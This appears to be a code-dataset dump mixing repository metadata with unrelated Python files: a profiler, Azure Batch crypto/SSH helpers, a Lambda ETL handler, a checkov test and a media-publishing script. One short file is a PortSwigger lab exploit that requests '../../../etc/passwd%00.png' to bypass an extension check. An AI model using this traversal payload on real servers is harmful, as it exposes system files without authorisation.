def run(self):
pass
if __name__ == "__main__":
task = TaskB()
task.run()
| 21.5
| 54
| 0.413621
| 78
| 602
| 3.089744
| 0.410256
| 0.165975
| 0.124481
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.039394
| 0.451827
| 602
| 28
| 55
| 21.5
| 0.690909
| 0
| 0
| 0.208333
| 0
| 0
| 0.013267
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.125
| false
| 0.083333
| 0
| 0
| 0.25
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0ab9be78769ca53a9456cd93a3fd3ab2a85a0c35
| 4,799
|
py
|
Python
|
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
vispy/util/profiler.py
|
izaid/vispy
|
402cf95bfef88d70c9c45bb27c532ed72944e14a
|
[
"BSD-3-Clause"
] | null | null | null |
# -*- coding: utf-8 -*-
# Copyright (c) 2014, Vispy Development Team.
# Distributed under the (new) BSD License. See LICENSE.txt for more info.
# Adapted from PyQtGraph
import sys
from . import ptime
from .. import config
class Profiler(object):
"""Simple profiler allowing directed, hierarchical measurement of time
intervals.
By default, profilers are disabled. To enable profiling, set the
environment variable `VISPYPROFILE` to a comma-separated list of
fully-qualified names of profiled functions.
Calling a profiler registers a message (defaulting to an increasing
counter) that contains the time elapsed since the last call. When the
profiler is about to be garbage-collected, the messages are passed to the
outer profiler if one is running, or printed to stdout otherwise.
If `delayed` is set to False, messages are immediately printed instead.
Example:
def function(...):
profiler = Profiler()
... do stuff ...
profiler('did stuff')
... do other stuff ...
profiler('did other stuff')
# profiler is garbage-collected and flushed at function end
If this function is a method of class C, setting `VISPYPROFILE` to
"C.function" (without the module name) will enable this profiler.
For regular functions, use the qualified name of the function, stripping
only the initial "vispy.." prefix from the module.
"""
_profilers = (config['profile'].split(",") if config['profile'] is not None
else [])
_depth = 0
_msgs = []
# set this flag to disable all or individual profilers at runtime
disable = False
class DisabledProfiler(object):
def __init__(self, *args, **kwds):
pass
def __call__(self, *args):
pass
def finish(self):
pass
def mark(self, msg=None):
pass
_disabled_profiler = DisabledProfiler()
def __new__(cls, msg=None, disabled='env', delayed=True):
"""Optionally create a new profiler based on caller's qualname.
"""
if (disabled is True or
(disabled == 'env' and len(cls._profilers) == 0)):
return cls._disabled_profiler
# determine the qualified name of the caller function
caller_frame = sys._getframe(1)
try:
caller_object_type = type(caller_frame.f_locals["self"])
except KeyError: # we are in a regular function
qualifier = caller_frame.f_globals["__name__"].split(".", 1)[1]
else: # we are in a method
qualifier = caller_object_type.__name__
func_qualname = qualifier + "." + caller_frame.f_code.co_name
if (disabled == 'env' and func_qualname not in cls._profilers and
'all' not in cls._profilers): # don't do anything
return cls._disabled_profiler
# create an actual profiling object
cls._depth += 1
obj = super(Profiler, cls).__new__(cls)
obj._name = msg or func_qualname
obj._delayed = delayed
obj._mark_count = 0
obj._finished = False
obj._firstTime = obj._last_time = ptime.time()
obj._new_msg("> Entering " + obj._name)
return obj
def __call__(self, msg=None, *args):
"""Register or print a new message with timing information.
"""
if self.disable:
return
if msg is None:
msg = str(self._mark_count)
self._mark_count += 1
new_time = ptime.time()
elapsed = (new_time - self._last_time) * 1000
self._new_msg(" " + msg + ": %0.4f ms", *(args + (elapsed,)))
self._last_time = new_time
def mark(self, msg=None):
self(msg)
def _new_msg(self, msg, *args):
msg = " " * (self._depth - 1) + msg
if self._delayed:
self._msgs.append((msg, args))
else:
self.flush()
print(msg % args)
def __del__(self):
self.finish()
def finish(self, msg=None):
"""Add a final message; flush the message list if no parent profiler.
"""
if self._finished or self.disable:
return
self._finished = True
if msg is not None:
self(msg)
self._new_msg("< Exiting %s, total time: %0.4f ms",
self._name, (ptime.time() - self._firstTime) * 1000)
type(self)._depth -= 1
if self._depth < 1:
self.flush()
def flush(self):
if self._msgs:
print("\n".join([m[0] % m[1] for m in self._msgs]))
type(self)._msgs = []
| 34.52518
| 79
| 0.583663
| 587
| 4,799
| 4.599659
| 0.337308
| 0.018148
| 0.016296
| 0.013333
| 0.028889
| 0
| 0
| 0
| 0
| 0
| 0
| 0.0092
| 0.320483
| 4,799
| 138
| 80
| 34.775362
| 0.818767
| 0.356324
| 0
| 0.202532
| 0
| 0
| 0.034343
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.139241
| false
| 0.050633
| 0.037975
| 0
| 0.329114
| 0.025316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0ac98e5cdb6676a542021f48c116aa5fa733e705
| 16,208
|
py
|
Python
|
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
convoy/crypto.py
|
hebinhuang/batch-shipyard
|
f87d94850380bee273eb51c5c35381952a5722b8
|
[
"MIT"
] | null | null | null |
# Copyright (c) Microsoft Corporation
#
# All rights reserved.
#
# MIT License
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED *AS IS*, WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
# compat imports
from __future__ import (
absolute_import, division, print_function, unicode_literals
)
from builtins import ( # noqa
bytes, dict, int, list, object, range, str, ascii, chr, hex, input,
next, oct, open, pow, round, super, filter, map, zip)
# stdlib imports
import base64
import collections
import getpass
import logging
import os
try:
import pathlib2 as pathlib
except ImportError:
import pathlib
import tempfile
import stat
import subprocess
# local imports
from . import settings
from . import util
# create logger
logger = logging.getLogger(__name__)
util.setup_logger(logger)
# global defines
_SSH_KEY_PREFIX = 'id_rsa_shipyard'
_REMOTEFS_SSH_KEY_PREFIX = '{}_remotefs'.format(_SSH_KEY_PREFIX)
# named tuples
PfxSettings = collections.namedtuple(
'PfxSettings', ['filename', 'passphrase', 'sha1'])
def get_ssh_key_prefix():
# type: (None) -> str
"""Get SSH key prefix
:rtype: str
:return: ssh key prefix
"""
return _SSH_KEY_PREFIX
def get_remotefs_ssh_key_prefix():
# type: (None) -> str
"""Get remote fs SSH key prefix
:rtype: str
:return: ssh key prefix for remote fs
"""
return _REMOTEFS_SSH_KEY_PREFIX
def generate_rdp_password():
# type: (None) -> str
"""Generate an RDP password
:rtype: str
:return: rdp password
"""
return base64.b64encode(os.urandom(8))
def generate_ssh_keypair(export_path, prefix=None):
# type: (str, str) -> tuple
"""Generate an ssh keypair for use with user logins
:param str export_path: keypair export path
:param str prefix: key prefix
:rtype: tuple
:return: (private key filename, public key filename)
"""
if util.is_none_or_empty(prefix):
prefix = _SSH_KEY_PREFIX
privkey = pathlib.Path(export_path, prefix)
pubkey = pathlib.Path(export_path, prefix + '.pub')
if privkey.exists():
old = pathlib.Path(export_path, prefix + '.old')
if old.exists():
old.unlink()
privkey.rename(old)
if pubkey.exists():
old = pathlib.Path(export_path, prefix + '.pub.old')
if old.exists():
old.unlink()
pubkey.rename(old)
logger.info('generating ssh key pair to path: {}'.format(export_path))
subprocess.check_call(
['ssh-keygen', '-f', str(privkey), '-t', 'rsa', '-N', ''''''])
return (privkey, pubkey)
def check_ssh_private_key_filemode(ssh_private_key):
# type: (pathlib.Path) -> bool
"""Check SSH private key filemode
:param pathlib.Path ssh_private_key: SSH private key
:rtype: bool
:return: private key filemode is ok
"""
def _mode_check(fstat, flag):
return bool(fstat & flag)
if util.on_windows():
return True
fstat = ssh_private_key.stat().st_mode
modes = frozenset((stat.S_IRWXG, stat.S_IRWXO))
return not any([_mode_check(fstat, x) for x in modes])
def connect_or_exec_ssh_command(
remote_ip, remote_port, ssh_private_key, username, sync=True,
shell=False, tty=False, ssh_args=None, command=None):
# type: (str, int, pathlib.Path, str, bool, bool, tuple, tuple) -> bool
"""Connect to node via SSH or execute SSH command
:param str remote_ip: remote ip address
:param int remote_port: remote port
:param pathlib.Path ssh_private_key: SSH private key
:param str username: username
:param bool sync: synchronous execution
:param bool shell: execute with shell
:param bool tty: allocate pseudo-tty
:param tuple ssh_args: ssh args
:param tuple command: command
:rtype: int or subprocess.Process
:return: return code or subprocess handle
"""
if not ssh_private_key.exists():
raise RuntimeError('SSH private key file not found at: {}'.format(
ssh_private_key))
# ensure file mode is set properly for the private key
if not check_ssh_private_key_filemode(ssh_private_key):
logger.warning(
'SSH private key filemode is too permissive: {}'.format(
ssh_private_key))
# execute SSH command
ssh_cmd = [
'ssh', '-o', 'StrictHostKeyChecking=no',
'-o', 'UserKnownHostsFile={}'.format(os.devnull),
'-i', str(ssh_private_key), '-p', str(remote_port),
]
if tty:
ssh_cmd.append('-t')
if util.is_not_empty(ssh_args):
ssh_cmd.extend(ssh_args)
ssh_cmd.append('{}@{}'.format(username, remote_ip))
if util.is_not_empty(command):
ssh_cmd.extend(command)
logger.info('{} node {}:{} with key {}'.format(
'connecting to' if util.is_none_or_empty(command)
else 'executing command on', remote_ip, remote_port, ssh_private_key))
if sync:
return util.subprocess_with_output(ssh_cmd, shell=shell)
else:
return util.subprocess_nowait_pipe_stdout(
ssh_cmd, shell=shell, pipe_stderr=True)
def derive_private_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a private key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def derive_public_key_pem_from_pfx(pfxfile, passphrase=None, pemfile=None):
# type: (str, str, str) -> str
"""Derive a public key pem file from a pfx
:param str pfxfile: pfx file
:param str passphrase: passphrase for pfx
:param str pemfile: path of pem file to write to
:rtype: str
:return: path of pem file
"""
if pfxfile is None:
raise ValueError('pfx file is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# convert pfx to pem
if pemfile is None:
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
pemfile = f.name
try:
# create pem from pfx
subprocess.check_call(
['openssl', 'pkcs12', '-nodes', '-in', pfxfile, '-out',
pemfile, '-password', 'pass:' + passphrase]
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', pemfile, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
except Exception:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
pemfile = None
return pemfile
def _parse_sha1_thumbprint_openssl(output):
# type: (str) -> str
"""Get SHA1 thumbprint from buffer
:param str buffer: buffer to parse
:rtype: str
:return: sha1 thumbprint of buffer
"""
# return just thumbprint (without colons) from the above openssl command
# in lowercase. Expected openssl output is in the form:
# SHA1 Fingerprint=<thumbprint>
return ''.join(util.decode_string(
output).strip().split('=')[1].split(':')).lower()
def get_sha1_thumbprint_pfx(pfxfile, passphrase):
# type: (str, str) -> str
"""Get SHA1 thumbprint of PFX
:param str pfxfile: name of the pfx file to export
:param str passphrase: passphrase for pfx
:rtype: str
:return: sha1 thumbprint of pfx
"""
if pfxfile is None:
raise ValueError('pfxfile is invalid')
if passphrase is None:
passphrase = getpass.getpass('Enter password for PFX: ')
# compute sha1 thumbprint of pfx
pfxdump = subprocess.check_output(
['openssl', 'pkcs12', '-in', pfxfile, '-nodes', '-passin',
'pass:' + passphrase]
)
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate(input=pfxdump)[0])
def get_sha1_thumbprint_pem(pemfile):
# type: (str) -> str
"""Get SHA1 thumbprint of PEM
:param str pfxfile: name of the pfx file to export
:rtype: str
:return: sha1 thumbprint of pem
"""
proc = subprocess.Popen(
['openssl', 'x509', '-noout', '-fingerprint', '-in', pemfile],
stdout=subprocess.PIPE
)
return _parse_sha1_thumbprint_openssl(proc.communicate()[0])
def generate_pem_pfx_certificates(config):
# type: (dict) -> str
"""Generate a pem and a derived pfx file
:param dict config: configuration dict
:rtype: str
:return: sha1 thumbprint of pfx
"""
# gather input
pemfile = settings.batch_shipyard_encryption_public_key_pem(config)
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
if pemfile is None:
pemfile = util.get_input('Enter public key PEM filename to create: ')
if pfxfile is None:
pfxfile = util.get_input('Enter PFX filename to create: ')
if passphrase is None:
while util.is_none_or_empty(passphrase):
passphrase = getpass.getpass('Enter password for PFX: ')
if len(passphrase) == 0:
print('passphrase cannot be empty')
privatekey = pemfile + '.key'
# generate pem file with private key and no password
f = tempfile.NamedTemporaryFile(mode='wb', delete=False)
f.close()
try:
subprocess.check_call(
['openssl', 'req', '-new', '-nodes', '-x509', '-newkey',
'rsa:2048', '-keyout', privatekey, '-out', f.name, '-days', '730',
'-subj', '/C=US/ST=None/L=None/O=None/CN=BatchShipyard']
)
# extract public key from private key
subprocess.check_call(
['openssl', 'rsa', '-in', privatekey, '-pubout', '-outform',
'PEM', '-out', pemfile]
)
logger.debug('created public key PEM file: {}'.format(pemfile))
# convert pem to pfx for Azure Batch service
subprocess.check_call(
['openssl', 'pkcs12', '-export', '-out', pfxfile, '-inkey',
privatekey, '-in', f.name, '-certfile', f.name,
'-passin', 'pass:', '-passout', 'pass:' + passphrase]
)
logger.debug('created PFX file: {}'.format(pfxfile))
finally:
# remove rsa private key file
fp = pathlib.Path(privatekey)
if fp.exists():
fp.unlink()
# remove temp cert pem
fp = pathlib.Path(f.name)
if fp.exists():
fp.unlink()
# get sha1 thumbprint of pfx
return get_sha1_thumbprint_pfx(pfxfile, passphrase)
def get_encryption_pfx_settings(config):
# type: (dict) -> tuple
"""Get PFX encryption settings from configuration
:param dict config: configuration settings
:rtype: tuple
:return: pfxfile, passphrase, sha1 tp
"""
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
sha1_cert_tp = settings.batch_shipyard_encryption_pfx_sha1_thumbprint(
config)
# manually get thumbprint of pfx if not exists in config
if util.is_none_or_empty(sha1_cert_tp):
if pfx_passphrase is None:
pfx_passphrase = getpass.getpass('Enter password for PFX: ')
sha1_cert_tp = get_sha1_thumbprint_pfx(pfxfile, pfx_passphrase)
settings.set_batch_shipyard_encryption_pfx_sha1_thumbprint(
config, sha1_cert_tp)
return PfxSettings(
filename=pfxfile, passphrase=pfx_passphrase, sha1=sha1_cert_tp)
def _rsa_encrypt_string(data, config):
# type: (str, dict) -> str
"""RSA encrypt a string
:param str data: clear text data to encrypt
:param dict config: configuration dict
:rtype: str
:return: base64-encoded cipher text
"""
if util.is_none_or_empty(data):
raise ValueError('invalid data to encrypt')
inkey = settings.batch_shipyard_encryption_public_key_pem(config)
derived = False
if inkey is None:
# derive pem from pfx
derived = True
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(
config)
inkey = derive_public_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
try:
if inkey is None:
raise RuntimeError('public encryption key is invalid')
proc = subprocess.Popen(
['openssl', 'rsautl', '-encrypt', '-pubin', '-inkey', inkey],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
ciphertext = util.base64_encode_string(
proc.communicate(input=util.encode_string(data))[0])
if proc.returncode != 0:
raise RuntimeError(
'openssl encryption failed with returncode: {}'.format(
proc.returncode))
return ciphertext
finally:
if derived:
fp = pathlib.Path(inkey)
if fp.exists():
fp.unlink()
def _rsa_decrypt_string_with_pfx(ciphertext, config):
# type: (str, dict) -> str
"""RSA decrypt a string
:param str ciphertext: cipher text in base64
:param dict config: configuration dict
:rtype: str
:return: decrypted cipher text
"""
if util.is_none_or_empty(ciphertext):
raise ValueError('invalid ciphertext to decrypt')
pfxfile = settings.batch_shipyard_encryption_pfx_filename(config)
pfx_passphrase = settings.batch_shipyard_encryption_pfx_passphrase(config)
pemfile = derive_private_key_pem_from_pfx(pfxfile, pfx_passphrase, None)
if pemfile is None:
raise RuntimeError('cannot decrypt without valid private key')
cleartext = None
try:
data = util.base64_decode_string(ciphertext)
proc = subprocess.Popen(
['openssl', 'rsautl', '-decrypt', '-inkey', pemfile],
stdin=subprocess.PIPE, stdout=subprocess.PIPE)
cleartext = proc.communicate(input=data)[0]
finally:
fp = pathlib.Path(pemfile)
if fp.exists():
fp.unlink()
return cleartext
def encrypt_string(enabled, string, config):
# type: (bool, str, dict) -> str
"""Encrypt a string
:param bool enabled: if encryption is enabled
:param str string: string to encrypt
:param dict config: configuration dict
:rtype: str
:return: encrypted string if enabled
"""
if enabled:
return _rsa_encrypt_string(string, config)
else:
return string
| 35.311547
| 79
| 0.653258
| 2,038
| 16,208
| 5.052012
| 0.185476
| 0.028166
| 0.022727
| 0.03312
| 0.41521
| 0.379856
| 0.32566
| 0.271465
| 0.221445
| 0.197358
| 0
| 0.006029
| 0.24272
| 16,208
| 458
| 80
| 35.388646
| 0.832817
| 0.296088
| 0
| 0.363636
| 0
| 0
| 0.120575
| 0.008142
| 0
| 0
| 0
| 0
| 0
| 1
| 0.064394
| false
| 0.125
| 0.060606
| 0.003788
| 0.200758
| 0.049242
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0add5b092c6c665d2b618a20a05d4cd299d00402
| 1,948
|
py
|
Python
|
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
src/handler.py
|
MrIgumnov96/ETL-CloudDeployment
|
666b85a9350460fba49f82ec90f5cddc0bdd0235
|
[
"Unlicense"
] | null | null | null |
import boto3
import src.app as app
import csv
import psycopg2 as ps
import os
from dotenv import load_dotenv
load_dotenv()
dbname = os.environ["db"]
host = os.environ["host"]
port = os.environ["port"]
user = os.environ["user"]
password = os.environ["pass"]
connection = ps.connect(dbname=dbname,
host=host,
port=port,
user=user,
password=password)
def handle(event, context):
cursor = connection.cursor()
cursor.execute("SELECT 1", ())
print(cursor.fetchall())
# Get key and bucket informaition
key = event['Records'][0]['s3']['object']['key']
bucket = event['Records'][0]['s3']['bucket']['name']
# use boto3 library to get object from S3
s3 = boto3.client('s3')
s3_object = s3.get_object(Bucket = bucket, Key = key)
data = s3_object['Body'].read().decode('utf-8')
all_lines = []
# read CSV
# csv_data = csv.reader(data.splitlines())
# for row in csv_data:
# datestr = row[0] #.replace('/', '-')
# # print(datestr)
# date_obj = datetime.strptime(datestr, '%d/%m/%Y %H:%M')
# # print(date_obj)
# # time = str(row[0][-5:])
# location = str(row[1])
# order = str(row[3])
# total = str(row[4])
# all_lines.append({'date':date_obj, 'location':location, 'order':order, 'total':total})
# return cached_list
# print(all_lines)
app.start_app(all_lines, data)
print_all_lines = [print(line) for line in all_lines]
print_all_lines
return {"message": "success!!! Check the cloud watch logs for this lambda in cloudwatch https://eu-west-1.console.aws.amazon.com/cloudwatch/home?region=eu-west-1#logsV2:log-groups"}
# Form all the lines of data into a list of lists
# all_lines = [line for line in csv_data]
# print(data)
# print(all_lines)
| 31.419355
| 185
| 0.587269
| 259
| 1,948
| 4.324324
| 0.42471
| 0.064286
| 0.046429
| 0.026786
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017446
| 0.264374
| 1,948
| 62
| 186
| 31.419355
| 0.764131
| 0.325975
| 0
| 0
| 0
| 0.032258
| 0.186191
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.032258
| false
| 0.064516
| 0.193548
| 0
| 0.258065
| 0.096774
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
0af1a3c68967c05606abe6a22eb2bbc2a17f6f6f
| 1,164
|
py
|
Python
|
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
tests/serverless/checks/aws/test_AdminPolicyDocument.py
|
peaudecastor/checkov
|
a4804b61c1b1390b7abd44ab53285fcbc3e7e80b
|
[
"Apache-2.0"
] | null | null | null |
import os
import unittest
from checkov.serverless.checks.function.aws.AdminPolicyDocument import check
from checkov.serverless.runner import Runner
from checkov.runner_filter import RunnerFilter
class TestAdminPolicyDocument(unittest.TestCase):
def test_summary(self):
runner = Runner()
current_dir = os.path.dirname(os.path.realpath(__file__))
# Used in
os.environ["sneaky_var"] = "*"
test_files_dir = current_dir + "/example_AdminPolicyDocument"
report = runner.run(root_folder=test_files_dir, runner_filter=RunnerFilter(checks=[check.id]))
summary = report.get_summary()
self.assertEqual(summary['passed'], 2,
f"Passed checks: {[fc.file_path for fc in report.passed_checks]}")
self.assertEqual(summary['failed'], 6,
f"Failed checks: {[fc.file_path for fc in report.failed_checks]}")
self.assertEqual(summary['skipped'], 0,
f"Skipped checks: {[fc.file_path for fc in report.skipped_checks]}")
self.assertEqual(summary['parsing_errors'], 0)
if __name__ == '__main__':
unittest.main()
| 36.375
| 102
| 0.668385
| 137
| 1,164
| 5.445255
| 0.40146
| 0.080429
| 0.117962
| 0.064343
| 0.116622
| 0.116622
| 0.116622
| 0.116622
| 0
| 0
| 0
| 0.00441
| 0.22079
| 1,164
| 31
| 103
| 37.548387
| 0.818082
| 0.006014
| 0
| 0
| 0
| 0
| 0.232035
| 0.082251
| 0
| 0
| 0
| 0
| 0.181818
| 1
| 0.045455
| false
| 0.090909
| 0.227273
| 0
| 0.318182
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
e40c283a7830ae526fea47bfe3f1719fdb809be3
| 358
|
py
|
Python
|
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
directory-traversal/validate-file-extension-null-byte-bypass.py
|
brandonaltermatt/penetration-testing-scripts
|
433b5d000a5573e60b9d8e49932cedce74937ebc
|
[
"MIT"
] | null | null | null |
"""
https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass
"""
import sys
import requests
site = sys.argv[1]
if 'https://' in site:
site = site.rstrip('/').lstrip('https://')
url = f'''https://{site}/image?filename=../../../etc/passwd%00.png'''
s = requests.Session()
resp = s.get(url)
print(resp.text)
| 21.058824
| 101
| 0.664804
| 52
| 358
| 4.576923
| 0.730769
| 0.067227
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.009288
| 0.097765
| 358
| 17
| 102
| 21.058824
| 0.727554
| 0.282123
| 0
| 0
| 0
| 0
| 0.292
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0.111111
| 0.222222
| 0
| 0.222222
| 0.111111
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 1
|
7c3522929deb4bb2524b97c1af2b5f08df9a050e
| 5,585
|
py
|
Python
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 1
|
2019-08-28T12:12:09.000Z
|
2019-08-28T12:12:09.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 8
|
2020-09-07T01:00:44.000Z
|
2022-03-02T05:19:32.000Z
|
backend/0_publish_audio.py
|
bmj-hackathon/ethberlinzwei-babelfish_3_0
|
e986ad1b9fa896f20d7cdd296d130d804f55ecfa
|
[
"Apache-2.0"
] | 3
|
2019-08-24T20:36:08.000Z
|
2021-02-18T20:28:11.000Z
|
import sys
import logging
# loggers_dict = logging.Logger.manager.loggerDict
#
# logger = logging.getLogger()
# logger.handlers = []
#
# # Set level
# logger.setLevel(logging.DEBUG)
#
# # FORMAT = "%(asctime)s - %(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
# # FORMAT = "%(asctime)s %(levelno)s: %(module)30s %(message)s"
# FORMAT = "%(levelno)s - %(module)-15s - %(funcName)-15s - %(message)s"
#
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# DATE_FMT = "%Y-%m-%d %H:%M:%S"
# formatter = logging.Formatter(FORMAT, DATE_FMT)
#
# # Create handler and assign
# handler = logging.StreamHandler(sys.stderr)
# handler.setFormatter(formatter)
# logger.handlers = [handler]
# logger.debug("Logging started")
#%%
# Standard imports
import os
from pathlib import Path
import json
from time import sleep
# Ocean imports
import squid_py
from squid_py.ocean.ocean import Ocean
from squid_py.config import Config
from pprint import pprint
import mantaray_utilities as manta_utils
from mantaray_utilities.user import password_map
#%% CONFIG
OCEAN_CONFIG_PATH = Path().cwd() / 'config_nile.ini'
assert OCEAN_CONFIG_PATH.exists(), "{} - path does not exist".format(OCEAN_CONFIG_PATH)
os.environ['OCEAN_CONFIG_PATH'] = str(OCEAN_CONFIG_PATH)
PASSWORD_PATH=Path().cwd() / ".nile_passwords"
assert PASSWORD_PATH.exists()
os.environ["PASSWORD_PATH"] = str(PASSWORD_PATH)
MARKET_PLACE_PROVIDER_ADDRESS="0x376817c638d2a04f475a73af37f7b51a2862d567"
os.environ["MARKET_PLACE_PROVIDER_ADDRESS"] = MARKET_PLACE_PROVIDER_ADDRESS
JSON_TEMPLATE = Path().cwd() / 'metadata_template.json'
assert JSON_TEMPLATE.exists()
#%% ARGPARSE
import argparse
parser = argparse.ArgumentParser(description='Publish audio')
parser.add_argument('--url', type=str, help='URL for input audio file')
parser.add_argument('--price', type=int, help='Selling price in Ocean token')
parser.add_argument('--reward', type=int, help='Reward offered in Ocean token')
parser.add_argument('--number-nodes', type=int, help='Number of processor nodes requested')
args = parser.parse_args()
logging.info("************************************************************".format())
logging.info("*** ETHBERLINZWEI HACKATHON ***".format())
logging.info("*** SPEECH2TEXT ***".format())
logging.info("*** STEP 1 - CLIENT REGISTERS A CLIP INTO OCEAN PROTOCOL ***".format())
logging.info("************************************************************".format())
logging.info("".format())
logging.info("(Step 1.1 not implemented - upload audio file from client to storage)".format())
